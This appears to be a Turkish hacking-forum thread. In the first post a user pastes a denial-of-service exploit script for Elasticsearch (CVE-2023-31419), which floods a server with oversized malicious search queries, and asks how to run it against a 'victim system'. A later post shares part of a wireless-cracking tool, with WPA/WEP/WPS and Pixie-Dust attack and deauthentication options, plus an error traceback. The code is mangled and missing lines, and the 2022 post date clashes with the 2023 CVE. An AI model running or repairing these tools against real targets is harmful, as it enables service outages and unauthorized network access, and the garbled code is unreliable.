Bulduğum Exploit'i Nasıl Çalıştıracağım?


7 Ağu 2022
Merhaba THT ailesi dün makinede var olan bir açık buldum ve bunun için exploit db kullanarak bir tane exploit buldum

Exploit şu: CVE-2023-31419

Fakat şu kodu kurban sisteme karşı nasil çalıştırılacağını çözemedim video eğitim ve ya konu varsa yardim ede bilirmisiniz ?

# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: Elasticsearch Platform — Find real-time answers at scale
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: GitHub - sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419: Elasticsearch Stack Overflow Vulnerability

import requests
import random
import string

es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL
index_name = '*'

payload = "/*" * 10000 + "\\" +"'" * 999

verify_ssl = False

username = 'elastic'
password = 'changeme'

auth = (username, password)

num_queries = 100

for _ in range(num_queries):
symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
search_query = {
"query": {
"match": {
"message": (symbols * 9000) + payload

print(f"Query {_ + 1} - Search Query:")

search_endpoint = f'{es_url}/{index_name}/_search'
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

if response.status_code == 200:
search_results = response.json()

print(f"Query {_ + 1} - Response:")

total_hits = search_results['hits']['total']['value']
print(f"Query {_ + 1}: Total hits: {total_hits}")

for hit in search_results['hits']['hits']:
source_data = hit['_source']
print("Payload result: {search_results}")
print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")


Kıdemli Üye
15 Mar 2022
Merhabalar, aşağıdaki konularda detaylı açıklamalar var işine yarayacaktır. İyi forumlar.


Yeni üye
2 Mar 2024
sayın hocalarım ve ustlerim formda yeniyim paydroid 3 için duzenledigim kodlarda 358.satirda hata mevcut.yardımcı olursaniz mutlu olurum paylasacagim kodlarin oncesinde ve sonrasinda kodlar mevcut

opt_parser = self.build_opt_parser()
options = opt_parser.parse_args()

if not set_encrypt and (options.wpa or options.wep or options.wps):
self.WPS_DISABLE = True
self.WPA_DISABLE = True
self.WEP_DISABLE = True
set_encrypt = True
if options.recrack:
print(GR + ' [+]' + W + ' including already cracked networks in targets.')
if options.wpa:
if options.wps:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks.')
print(GR + ' [+]' + W + ' targeting ' + G + 'WPA' + W + ' encrypted networks (use ' + G + '-wps' + W + ' for WPS scan)')
self.WPA_DISABLE = False
if options.wep:
print(GR + ' [+]' + W + ' targeting ' + G + 'WEP' + W + ' encrypted networks')
self.WEP_DISABLE = False
if options.wps:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.')
self.WPS_DISABLE = False
if options.pixie:
print(GR + ' [+]' + W + ' targeting ' + G + 'WPS-enabled' + W + ' networks.')
print(GR + ' [+]' + W + ' using only ' + G + 'WPS Pixie-Dust' + W + ' attack.')
self.WPS_DISABLE = False
self.WEP_DISABLE = True
self.PIXIE = True
if options.channel:
self.TARGET_CHANNEL = int(options.channel)
except ValueError:
print(O + ' [!]' + R + ' invalid channel: ' + O + options.channel + W)
except IndexError:
print(O + ' [!]' + R + ' no channel given!' + W)
print(GR + ' [+]' + W + ' channel set to %s' % (G + str(self.TARGET_CHANNEL) + W))
if options.mac_anon:
print(GR + ' [+]' + W + ' mac address anonymizing ' + G + 'enabled' + W)
print(O + ' not: only works if device is not already in monitor mode!' + W)
self.DO_NOT_CHANGE_MAC = False
if options.interface:
self.WIRELESS_IFACE = options.interface
print(GR + ' [+]' + W + ' set interface :%s' % (G + self.WIRELESS_IFACE + W))
if options.monitor_interface:
self.MONITOR_IFACE = options.monitor_interface
print(GR + ' [+]' + W + ' set interface already in monitor mode :%s' % (G + self.MONITOR_IFACE + W))
if options.nodeauth:
self.SEND_DEAUTHS = False
print(GR + ' [+]' + W + ' will not deauthenticate clients while scanning%s' % W)
if options.essid:
self.TARGET_ESSID = options.essid
except ValueError:
print(R + ' [!]' + O + ' no ESSID given!' + W)
print(GR + ' [+]' + W + ' targeting ESSID "%s"' % (G + self.TARGET_ESSID + W))
if options.bssid:


Yeni üye
2 Mar 2024
Traceback (most recent call last):
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 31, in <module>
File "/data/user/0/ru.iiec.pydroid3/files/accomp_files/iiec_run/iiec_run.py", line 30, in start
exec(open(mainpyfile).read(), __main__.__dict__)
File "<string>", line 358
if options.nodeauth:
SyntaxError: expected 'except' or 'finally' block

[Program finished]

if options.nodeauth:

